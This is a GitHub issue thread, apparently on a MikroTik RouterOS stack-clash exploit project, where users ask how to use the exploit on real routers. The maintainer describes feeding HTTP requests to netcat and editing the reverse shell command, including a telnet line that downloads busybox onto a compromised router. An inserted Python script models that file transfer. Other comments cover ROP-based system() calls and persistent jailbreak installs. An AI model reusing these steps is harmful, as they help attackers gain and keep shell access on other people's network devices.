How to exploit it in the real world? #6
Comments
I think this request is out of the scope of this repo.
Hi BigNerd, the question is how to upload a busybox or tinyshell remotely and create the rc.d, run.d and the bash file without mounting the sda. Thanks for your great work, greetings! 💪
Look at this line of code: I passed the HTTP request to the stdin of netcat
Anyway
Or another easy way is to edit the reverse shell command with something like this: "/bin/telnet 192.168.8.5 1234 > /ram/busybox" and open netcat on the PC with this: This should be able to upload the binary
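As an added illustration (not BigNerd95's code and not part of this repo), the upload trick above reduced to its mechanics: a one-shot TCP listener standing in for netcat on the PC, a raw TCP client standing in for the router's `/bin/telnet HOST PORT > /ram/busybox` redirect, and a SHA-256 on both ends so you can tell whether the file arrived byte-for-byte. Assumptions: both sides run on localhost with an OS-chosen port, and a constructed byte string is used in place of busybox-mips.

```python
import hashlib
import socket
import threading

# Constructed stand-in for busybox-mips (not a real binary). It deliberately
# contains 0xFF bytes, the telnet IAC byte, so the check below has something to flag.
SAMPLE_BINARY = bytes(range(256)) * 4


def sha256_hex(data):
    """Digest to compare on both ends of the transfer."""
    return hashlib.sha256(data).hexdigest()


def count_iac_bytes(data):
    """Number of 0xFF bytes. A telnet client treats 0xFF as the start of an
    IAC command sequence, so a non-zero count means a telnet-based redirect
    may not deliver the file byte-for-byte; check the digest after the copy."""
    return data.count(0xFF)


def serve_file_once(data, host="127.0.0.1", port=0):
    """PC side (what 'nc -l -p PORT < busybox-mips' does): accept one
    connection, write the whole file, close. Returns (thread, bound_port);
    port 0 lets the OS pick a free port (assumption for the local demo)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    bound_port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(data)
            conn.shutdown(socket.SHUT_WR)  # EOF tells the client it has everything
        srv.close()

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return t, bound_port


def fetch_to_bytes(host, port):
    """Router side ('/bin/telnet HOST PORT > /ram/busybox'), modelled with a
    plain TCP client: connect, read until EOF, return what the shell
    redirect would have written to the file."""
    chunks = []
    with socket.create_connection((host, port), timeout=10) as c:
        while True:
            chunk = c.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def transfer_and_verify(data):
    """Run both sides on localhost and report whether the copy is intact."""
    thread, port = serve_file_once(data)
    received = fetch_to_bytes("127.0.0.1", port)
    thread.join(timeout=10)
    return {
        "sent_sha256": sha256_hex(data),
        "received_sha256": sha256_hex(received),
        "intact": received == data,
        "iac_bytes": count_iac_bytes(data),
    }


if __name__ == "__main__":
    print(transfer_and_verify(SAMPLE_BINARY))
```

The client here is a raw socket, so it models only the data path, not a real telnet client. A real telnet client interprets 0xFF in the received stream as IAC and may also send negotiation bytes to the listener, which is why comparing a digest (or at least the file size) on the router after the copy is the check worth doing before chmod-ing and running the binary.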
Thanks for your answer, I did not achieve remote command execution. Cool, it is true this can also work with telnet 🏄
Test:
Could you test using 6.38.4?
Try to make it crash before the stack clash
All my code is for python3. Anyway I put the shebang in the first line of my scripts
You're right, it happens that I have not made them executable, excuse my ignorance, thanks for the information, I did not read the shebang. I found a fork of pwntools for python 3
I can upload busybox to the VM on RouterOS 6.35.4 but I don't get how I can get a shell with busybox running. Thanks for the help in advance
@SrSands you mean you can connect to the shell but don't know how to use the newly uploaded busybox?
I think you can add the aliases to startup scripts somehow. Not sure. The other option is to write softlinks for the commands under Also this guy made an automated "jailbreak" that installs busybox and enables devel-login: https://github.com/0ki/mikrotik-tools Edit: Hmm... so I guess this is their setup script on the router side: Basically copy busybox to
Simply copy the new busybox in
I don't know why you do not read my README.md
The PATH already contains
@BigNerd95 thanks, the telnet upload wasn't working for me so I guess I didn't read past that part ^^;; Btw I don't have
Edit: After I did the steps for a persistent install manually, it appeared in PATH :))
@BigNerd95 Thanks, I didn't pay attention to the reverse telnet but anyway I'm going to try both methods. EDIT: I tried the persistent telnet example but it keeps failing asking me for the ropper module although I installed it from the git repository. I think it is an error on my end and I'm still working on it (I don't have as much free time as I want)
Thanks for the help @BigNerd95 & @tostercx but every time that I try to interact with busybox-mips I get: I don't know what I'm doing wrong. If anyone can help me a little I would be thankful
If you receive these three "not found" it's normal
Then maybe it is a problem with the busybox version because this is happening: chmod 777 /flash/bin/busybox-mips Thanks in advance
export PATH=/flash/bin:$PATH
Getting the same result :( chmod 777 /flash/bin/busybox-mips
Try with: /flash/bin/ls -l
Same result /flash/bin/ls -l
Now I can run system() via ROP, but I don't know how to exploit it without adding our busybox, because the default busybox only supports a few commands.